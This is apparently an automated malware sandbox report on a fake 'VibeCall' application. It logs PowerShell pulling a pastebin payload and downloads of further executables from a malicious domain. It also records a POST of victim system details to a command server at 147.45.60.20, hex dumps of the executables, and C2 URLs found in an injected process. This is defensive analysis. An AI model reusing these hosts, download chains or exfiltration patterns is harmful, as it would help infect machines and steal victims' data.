                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 02 Mar 2025 21:00:51 GMTContent-Type: application/octet-streamContent-Length: 16403908Connection: keep-aliveLast-Modified: Fri, 28 Feb 2025 15:05:18 GMTETag: "67c1d0ae-fa4dc4"Cache-Control: max-age=14400CF-Cache-Status: EXPIREDAccept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sRVQWu98IO5RW3wNr5N%2Bwnk8MGzqXoz8y0SAiumBrR%2BiNYPFdTTtwLYJVSAk79Vi9s14ByCeJl%2F6PskOejb6lvwzzRi5w3L5i45XG%2B6PSJsjkxp0NRcvCqKYwZRgkGDB%2F3YQAkEaLw4Gwms%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91a3d374ffc3566e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1635&min_rtt=1635&rtt_var=817&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=88&delivery_rate=0&cwnd=89&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 46 58 32 cc 02 39 5c 9f 02 39 5c 9f 02 39 5c 9f 70 b8 5f 9e 1e 39 5c 9f 70 b8 59 9e ae 39 5c 9f 70 b8 58 9e 1b 39 5c 9f 13 bf 5f 9e 14 39 5c 9f 13 bf 58 9e 13 39 5c 9f 13 bf 59 9e 50 39 5c 9f 70 b8 5d 9e 01 39 5c 9f 02 39 5d 9f 7e 39 5c 9f 86 bf 59 9e 01 39 5c 9f 86 bf 5e 9e 03 39 5c 9f 52 69 63 68 02 39 5c 9f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 6f 5b be 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 58 02 00 00 d6 57 00 00 00 00 00 b6 72 00 00 00 10 00 00 00 70 02 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS 
mode.$FX29\9\9\p_9\pY9\pX9\_9\X9\YP9\p]9\9]~9\Y9\^9\Rich9\PELo[g*XWrp@
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Sun, 02 Mar 2025 21:00:57 GMT | Content-Type: application/octet-stream | Content-Length: 17066346 | Connection: keep-alive | Last-Modified: Fri, 28 Feb 2025 15:41:38 GMT | ETag: "67c1d932-104696a" | Cache-Control: max-age=14400 | CF-Cache-Status: EXPIRED | Accept-Ranges: bytes | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=twbXvUDyyc8uMaNB449P2cl7sNyPO2SXoUwz0BmzAei2eOVpa2R2URdAKlQq1xYwO1shCrLr2QWzW6p1DNe3Lfhu8gF83RtJqg6bJGO7K8DN6PH9Lhtl%2BWsQ34FfjrM23l7SjkQZhDIhZoA%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 91a3d39bd8acc32d-EWR | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1637&min_rtt=1637&rtt_var=818&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=88&delivery_rate=0&cwnd=102&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 3d 7c e6 93 5c 12 b5 93 5c 12 b5 93 5c 12 b5 87 37 16 b4 9f 5c 12 b5 87 37 17 b4 94 5c 12 b5 87 37 11 b4 96 5c 12 b5 0d fc d5 b5 81 5c 12 b5 4a 21 13 b4 91 5c 12 b5 4a 21 17 b4 b0 5c 12 b5 4a 21 16 b4 92 5c 12 b5 82 da 11 b4 9e 5c 12 b5 82 da 16 b4 98 5c 12 b5 82 da 17 b4 da 5c 12 b5 e1 dd 13 b4 90 5c 12 b5 93 5c 13 b5 21 5c 12 b5 17 da 17 b4 90 5c 12 b5 17 da 10 b4 92 5c 12 b5 52 69 63 68 93 5c 12 b5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 83 35 bc 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 da 01 00 00 46 52 00 00 00 00 00 f0 89 00 00 00 10 | Data Ascii: MZ@!L!This program cannot be run in DOS mode.$=|\\\7\7\7\\J!\J!\J!\\\\\\!\\\Rich\PEL5g*FR
Source: global traffic | HTTP traffic detected: GET /downloads/aisolution_vibecall_a.exe HTTP/1.1 | Host: rustaisolutionnorisk.com
Source: global traffic | HTTP traffic detected: GET /downloads/contry_solution_vibecall_e.exe HTTP/1.1 | Host: rustaisolutionnorisk.com
Source: global traffic | HTTP traffic detected: GET /downloads/soundsolution_vibecall_c.exe HTTP/1.1 | Host: rustaisolutionnorisk.com
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: api.ipify.org
Source: global traffic | HTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1 | Host: ip-api.com
Source: global traffic | HTTP traffic detected: POST /send HTTP/1.1 | Host: 147.45.60.20:5000 | Content-Type: application/json; charset=utf-8 | Content-Length: 1102 | Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 22 5c 75 32 37 30 35 20 31 20 5c 75 30 34 31 31 5c 75 30 34 33 38 5c 75 30 34 33 42 5c 75 30 34 33 34 20 5c 75 30 34 33 37 5c 75 30 34 33 30 5c 75 30 34 33 46 5c 75 30 34 34 33 5c 75 30 34 34 39 5c 75 30 34 33 35 5c 75 30 34 33 44 20 5c 75 32 37 30 35 5c 6e 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 5c 75 44 38 33 44 5c 75 44 44 33 30 20 5c 75 30 34 31 42 5c 75 30 34 33 30 5c 75 30 34 34 33 5c 75 30 34 33 44 5c 75 30 34 34 37 5c 75 30 34 33 35 5c 75 30 34 34 30 3a 20 56 69 62 65 43 61 6c 6c 20 5c 6e 20 5c 75 44 38 33 44 5c 75 44 45 38 30 20 5c 75 30 34 31 37 5c 75 30 34 33 30 5c 75 30 34 33 46 5c 75 30 34 34 33 5c 75 30 34 34 31 5c 75 30 34 33 41 3a 20 5c 75 30 34 32 33 5c 75 30 34 33 34 5c 75 30 34 33 30 5c 75 30 34 34 37 5c 75 30 34 33 44 5c 75 30 34 34 42 5c 75 30 34 33 39 20 5c 6e 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 5c 75 44 38 33 44 5c 75 44 44 31 37 20 5c 75 30 34 31 30 5c 75 30 34 33 39 5c 75 30 34 33 46 5c 75 30 34 33 38 3a 20 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 20 5c 6e 5c 75 44 38 33 43 5c 75 44 46 30 45 20 5c 75 30 34 32 31 5c 75 30 34 34 32 5c 75 30 34 34 30 5c 75 30 34 33 30 5c 75 30 34 33 44 5c 75 30 34 33 30 3a 20 20 55 6e 69 74 65 64 20 53 74 61 74 65 73 20 5c 6e 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 5c 75 44 38 33 44 5c 75 44 44 32 30 20 5c 75 30 34 32 46 5c 75 30 34 33 37 5c 75 30 34 34 42 5c 75 30 34 33 41 3a 20 45 6e 67 6c 69 73 68 20 28 53 77 69 74 7a 65 72 6c 61 6e 64 29 20 5c 6e 5c 75 44 38 33 44 5c 75 44 43 36 34 20 5c 75 30 34 31 38 5c 75 30 34 33 43 5c 75 30 34 34 46 20 5c 75 30 34 33 46 5c 75 30 34 33 45 5c 75 30 34 33 42 5c 75 30 34 34 43 5c 75 30 34 33 37 5c 75 30 34 33 45 5c 75 30 34 33 32 5c 75 30 34 33 30 5c 75 30 34 34 32 5c 75 30 34 33 35 5c 75 30 34 33 42 5c 75 30 34 34 46 3a 20 6a 6f 6e 65 73 20 28 33 32 30 33 36 36 29 20 5c 6e 5c 75 44 38 33 44 5c 75 44 44 41 35 20 5c 75 30 34 32 31 5c 75 30 34 33 38 5c 75 30 34 34 31 5c 75 30 34 34 32 5c 75 30 34 33 35 5c 75 30 34 33 43 5c 75 30 34 33 30 3a 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 5c 75 44 38 33 43 5c 75 44 46 41 45 20 5c 75 30 34 31 32 5c 75 30 34 33 38 5c 75 30 34 33 34 5c 75 30 34 33 35 5c 75 30 34 33 45 5c 75 30 34 33 41 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 34 32 5c 75 30 34 33 30 3a 20 36 42 55 4e 32 55 47 20 5c 6e 5c 75 32 36 39 39 5c 75 46 45 30 46 20 5c 75 30 34 31 46 5c 75 30 34 34 30 5c 75 30 34 33 45 5c 75 30 34 34 36 5c 75 30 34 33 35 5c 75 30 34 34 31 5c 75 30 34 34 31 5c 75 30 34 33 45 5c 75 30 34 34 30 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 3
Source: global traffic | HTTP traffic detected: GET /downloads/videosolution_vibecall_b.exe HTTP/1.1 | Host: rustaisolutionnorisk.com
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: api.ipify.org
Source: global traffic | HTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1 | Host: ip-api.com
Source: global traffic | HTTP traffic detected: POST /send HTTP/1.1 | Host: 147.45.60.20:5000 | Content-Type: application/json; charset=utf-8 | Content-Length: 1102 | Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 22 5c 75 32 37 30 35 20 32 20 5c 75 30 34 31 31 5c 75 30 34 33 38 5c 75 30 34 33 42 5c 75 30 34 33 34 20 5c 75 30 34 33 37 5c 75 30 34 33 30 5c 75 30 34 33 46 5c 75 30 34 34 33 5c 75 30 34 34 39 5c 75 30 34 33 35 5c 75 30 34 33 44 20 5c 75 32 37 30 35 5c 6e 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 5c 75 44 38 33 44 5c 75 44 44 33 30 20 5c 75 30 34 31 42 5c 75 30 34 33 30 5c 75 30 34 34 33 5c 75 30 34 33 44 5c 75 30 34 34 37 5c 75 30 34 33 35 5c 75 30 34 34 30 3a 20 56 69 62 65 43 61 6c 6c 20 5c 6e 20 5c 75 44 38 33 44 5c 75 44 45 38 30 20 5c 75 30 34 31 37 5c 75 30 34 33 30 5c 75 30 34 33 46 5c 75 30 34 34 33 5c 75 30 34 34 31 5c 75 30 34 33 41 3a 20 5c 75 30 34 32 33 5c 75 30 34 33 34 5c 75 30 34 33 30 5c 75 30 34 34 37 5c 75 30 34 33 44 5c 75 30 34 34 42 5c 75 30 34 33 39 20 5c 6e 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 5c 75 44 38 33 44 5c 75 44 44 31 37 20 5c 75 30 34 31 30 5c 75 30 34 33 39 5c 75 30 34 33 46 5c 75 30 34 33 38 3a 20 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 20 5c 6e 5c 75 44 38 33 43 5c 75 44 46 30 45 20 5c 75 30 34 32 31 5c 75 30 34 34 32 5c 75 30 34 34 30 5c 75 30 34 33 30 5c 75 30 34 33 44 5c 75 30 34 33 30 3a 20 20 55 6e 69 74 65 64 20 53 74 61 74 65 73 20 5c 6e 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 5c 75 44 38 33 44 5c 75 44 44 32 30 20 5c 75 30 34 32 46 5c 75 30 34 33 37 5c 75 30 34 34 42 5c 75 30 34 33 41 3a 20 45 6e 67 6c 69 73 68 20 28 53 77 69 74 7a 65 72 6c 61 6e 64 29 20 5c 6e 5c 75 44 38 33 44 5c 75 44 43 36 34 20 5c 75 30 34 31 38 5c 75 30 34 33 43 5c 75 30 34 34 46 20 5c 75 30 34 33 46 5c 75 30 34 33 45 5c 75 30 34 33 42 5c 75 30 34 34 43 5c 75 30 34 33 37 5c 75 30 34 33 45 5c 75 30 34 33 32 5c 75 30 34 33 30 5c 75 30 34 34 32 5c 75 30 34 33 35 5c 75 30 34 33 42 5c 75 30 34 34 46 3a 20 6a 6f 6e 65 73 20 28 33 32 30 33 36 36 29 20 5c 6e 5c 75 44 38 33 44 5c 75 44 44 41 35 20 5c 75 30 34 32 31 5c 75 30 34 33 38 5c 75 30 34 34 31 5c 75 30 34 34 32 5c 75 30 34 33 35 5c 75 30 34 33 43 5c 75 30 34 33 30 3a 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 5c 75 44 38 33 43 5c 75 44 46 41 45 20 5c 75 30 34 31 32 5c 75 30 34 33 38 5c 75 30 34 33 34 5c 75 30 34 33 35 5c 75 30 34 33 45 5c 75 30 34 33 41 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 34 32 5c 75 30 34 33 30 3a 20 36 42 55 4e 32 55 47 20 5c 6e 5c 75 32 36 39 39 5c 75 46 45 30 46 20 5c 75 30 34 31 46 5c 75 30 34 34 30 5c 75 30 34 33 45 5c 75 30 34 34 36 5c 75 30 34 33 35 5c 75 30 34 34 31 5c 75 30 34 34 31 5c 75 30 34 33 45 5c 75 30 34 34 30 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 3
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | IP Address: 104.20.4.235
Source: Joe Sandbox View | IP Address: 104.20.4.235
Source: Joe Sandbox View | ASN Name: VDI-NETWORKUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: api.ipify.org
Source: unknown | DNS query: name: api.ipify.org
Source: unknown | DNS query: name: ip-api.com
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49742 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49743 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49744 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49745 -> 172.67.74.152:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 208.95.112.1:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49748 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49749 -> 172.67.74.152:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49753 -> 172.67.74.152:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49779 -> 172.67.74.152:80
Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49740 -> 104.20.4.235:443
Source: global traffic | HTTP traffic detected: GET /raw/QE03kE1s HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /dns-query HTTP/1.1 | Host: cloudflare-dns.com | Accept: application/dns-message | Host: cloudflare-dns.com | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 | Content-Length: 38 | Content-Type: application/dns-message
Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.60.20
Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.60.20
Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.60.20
Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.60.20
Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.60.20
Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.60.20
Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.60.20
Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.60.20
Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.60.20
Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.60.20
Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.60.20
Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.60.20
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\SysWOW64\fontdrvhost.exe | Code function: 31_2_056EB654 WSARecv,WSAGetLastError,31_2_056EB654
Source: global traffic | HTTP traffic detected: GET /raw/QE03kE1s HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /downloads/aisolution_vibecall_a.exe HTTP/1.1 | Host: rustaisolutionnorisk.com
Source: global traffic | HTTP traffic detected: GET /downloads/contry_solution_vibecall_e.exe HTTP/1.1 | Host: rustaisolutionnorisk.com
Source: global traffic | HTTP traffic detected: GET /downloads/soundsolution_vibecall_c.exe HTTP/1.1 | Host: rustaisolutionnorisk.com
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: api.ipify.org
Source: global traffic | HTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1 | Host: ip-api.com
Source: global traffic | HTTP traffic detected: GET /downloads/videosolution_vibecall_b.exe HTTP/1.1 | Host: rustaisolutionnorisk.com
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: api.ipify.org
Source: global traffic | HTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1 | Host: ip-api.com
Source: global traffic | DNS traffic detected: DNS query: pastebin.com
Source: global traffic | DNS traffic detected: DNS query: rustaisolutionnorisk.com
Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: global traffic | DNS traffic detected: DNS query: api.mirrow1-dell.xyz
Source: unknown | DoH DNS queries detected: name: api.mirrow1-dell.xyz
Source: unknown | HTTP traffic detected: POST /dns-query HTTP/1.1 | Host: cloudflare-dns.com | Accept: application/dns-message | Host: cloudflare-dns.com | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 | Content-Length: 38 | Content-Type: application/dns-message
Source: VibeCall.exe, 00000000.00000000.1698421125.00007FF735D3D000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.css
Source: VibeCall.exe, 00000000.00000000.1698421125.00007FF735D3D000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.jpg
Source: soundsolution_vibecall_c.exe, 00000011.00000000.2232602474.0000000000507000.00000002.00000001.01000000.0000000F.sdmp | String found in binary or memory: http://aia.entrust.net/evcs2-chain.p7c01
Source: soundsolution_vibecall_c.exe, 00000011.00000000.2232602474.0000000000507000.00000002.00000001.01000000.0000000F.sdmp | String found in binary or memory: http://aia.entrust.net/ts2-chain256.p7c01
Source: soundsolution_vibecall_c.exe, 00000011.00000000.2232602474.0000000000507000.00000002.00000001.01000000.0000000F.sdmp | String found in binary or memory: http://crl.entrust.net/csbr1.crl0
Source: soundsolution_vibecall_c.exe, 00000011.00000000.2232602474.0000000000507000.00000002.00000001.01000000.0000000F.sdmp | String found in binary or memory: http://crl.entrust.net/evcs2.crl0
Source: soundsolution_vibecall_c.exe, 00000011.00000000.2232602474.0000000000507000.00000002.00000001.01000000.0000000F.sdmp | String found in binary or memory: http://crl.entrust.net/g2ca.crl0
Source: soundsolution_vibecall_c.exe, 00000011.00000000.2232602474.0000000000507000.00000002.00000001.01000000.0000000F.sdmp | String found in binary or memory: http://crl.entrust.net/ts2ca.crl0
Source: VibeCall.exe, 00000000.00000003.1707821796.000001CCB0BAD000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1708022699.000001CCB0BAD000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1708450882.000001CCB0BAD000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1708102002.000001CCB0BAD000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1707649515.000001CCB0BAD000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1707378859.000001CCB0BAD000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1708266060.000001CCB0BAD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://en.w
Source: VibeCall.exe, 00000000.00000000.1698421125.00007FF735D3D000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: http://html4/loose.dtd
Source: powershell.exe, 00000002.00000002.1866786065.0000024D1F0D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1864011647.000001DC6C4A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1802434498.000001DC5D94A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1864011647.000001DC6C363000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2055618666.00000144AF713000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: soundsolution_vibecall_c.exe, 00000011.00000000.2232602474.0000000000507000.00000002.00000001.01000000.0000000F.sdmp | String found in binary or memory: http://ocsp.entrust.net00
Source: soundsolution_vibecall_c.exe, 00000011.00000000.2232602474.0000000000507000.00000002.00000001.01000000.0000000F.sdmp | String found in binary or memory: http://ocsp.entrust.net01
Source: soundsolution_vibecall_c.exe, 00000011.00000000.2232602474.0000000000507000.00000002.00000001.01000000.0000000F.sdmp | String found in binary or memory: http://ocsp.entrust.net02
Source: soundsolution_vibecall_c.exe, 00000011.00000000.2232602474.0000000000507000.00000002.00000001.01000000.0000000F.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000004.00000002.1802434498.000001DC5D8C8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pastebin.com
Source: powershell.exe, 00000009.00000002.1939098908.000001449F8C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1802031537.0000024D0F288000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1939098908.000001449F8C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.1802031537.0000024D0F061000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1802434498.000001DC5C2F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1939098908.000001449F6A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1802031537.0000024D0F288000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1939098908.000001449F8C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: VibeCall.exe, 00000000.00000003.1721387410.000001CCB0BAD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000009.00000002.1939098908.000001449F8C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: VibeCall.exe, 00000000.00000003.1740281898.000001CCB0BAD000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1741281482.000001CCB0BA1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.ascendercorp.com/typedesigners.html-
Source: soundsolution_vibecall_c.exe, 00000011.00000000.2232602474.0000000000507000.00000002.00000001.01000000.0000000F.sdmp | String found in binary or memory: http://www.entrust.net/rpa0
Source: soundsolution_vibecall_c.exe, 00000011.00000000.2232602474.0000000000507000.00000002.00000001.01000000.0000000F.sdmp | String found in binary or memory: http://www.entrust.net/rpa03
Source: VibeCall.exe, 00000000.00000003.1741539213.000001CCB0BA3000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1741281482.000001CCB0BA1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: VibeCall.exe, 00000000.00000003.1705357700.000001CCB0BB2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: VibeCall.exe, 00000000.00000003.1705357700.000001CCB0BB2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.comf
Source: VibeCall.exe, 00000000.00000003.1720377801.000001CCB0BAD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com)
Source: VibeCall.exe, 00000000.00000003.1720303621.000001CCB0BD8000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1720350423.000001CCB0BD9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com6
Source: VibeCall.exe, 00000000.00000003.1720800530.000001CCB0BB7000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1720657232.000001CCB0BAD000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1720528563.000001CCB0BAD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.comddH
Source: fontdrvhost.exe, fontdrvhost.exe, 00000025.00000002.2598003533.0000025F79D60000.00000040.00000001.00020000.00000000.sdmp | String found in binary or memory: https://171.22.120.233:4955/6519b3d55998bf5e49d571/9uhjmqat.jd8rm
Source: fontdrvhost.exe, 00000025.00000002.2598003533.0000025F79D60000.00000040.00000001.00020000.00000000.sdmp | String found in binary or memory: https://171.22.120.233:4955/6519b3d55998bf5e49d571/9uhjmqat.jd8rmkernelbasentdllkernel32GetProcessMi
Source: fontdrvhost.exe | String found in binary or memory: https://45.129.185.24:1896/22c0d31ace677b/digpu6k5.xditc
Source: VibeCall.exe, 00000000.00000000.1698421125.00007FF735D3D000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://aka.ms/dotnet-core-applaunch?
Source: VibeCall.exe, 00000000.00000000.1698421125.00007FF735D3D000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://aka.ms/dotnet-core-applaunch?Description:
Source: VibeCall.exe, 00000000.00000000.1698421125.00007FF735D3D000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://aka.ms/dotnet/app-launch-failed
